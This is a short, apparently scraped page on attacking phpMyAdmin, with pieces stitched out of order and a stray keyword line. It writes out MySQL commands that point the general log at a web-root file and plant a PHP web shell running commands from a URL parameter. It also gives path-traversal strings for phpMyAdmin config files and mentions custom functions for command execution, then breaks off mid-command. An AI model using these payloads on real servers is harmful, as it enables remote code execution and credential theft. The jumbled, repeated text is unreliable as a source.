Phpmyadmin Hacktricks May 2026

SET GLOBAL general_log = 'ON'; SET GLOBAL general_log_file = '/var/www/html/shell.php'; SELECT '<?php system($_GET["cmd"]); ?>'; SET GLOBAL general_log = 'OFF'; For MySQL versions < 5.1 or with plugin directory writable, compile a shared library and create a custom function to run commands.

../../etc/phpmyadmin/config.inc.php ../../var/lib/phpmyadmin/config.inc.php .../config.inc.php Look for: phpmyadmin hacktricks

Introduction phpMyAdmin is the most popular database management tool on the planet. Written in PHP, it provides a web-based interface to manage MySQL and MariaDB servers. While it is a godsend for developers, it is a prime target for attackers. If an adversary gains access to phpMyAdmin, the game is over — they can dump credentials, escalate privileges, and even gain remote code execution (RCE) on the host server. SET GLOBAL general_log = 'ON'; SET GLOBAL general_log_file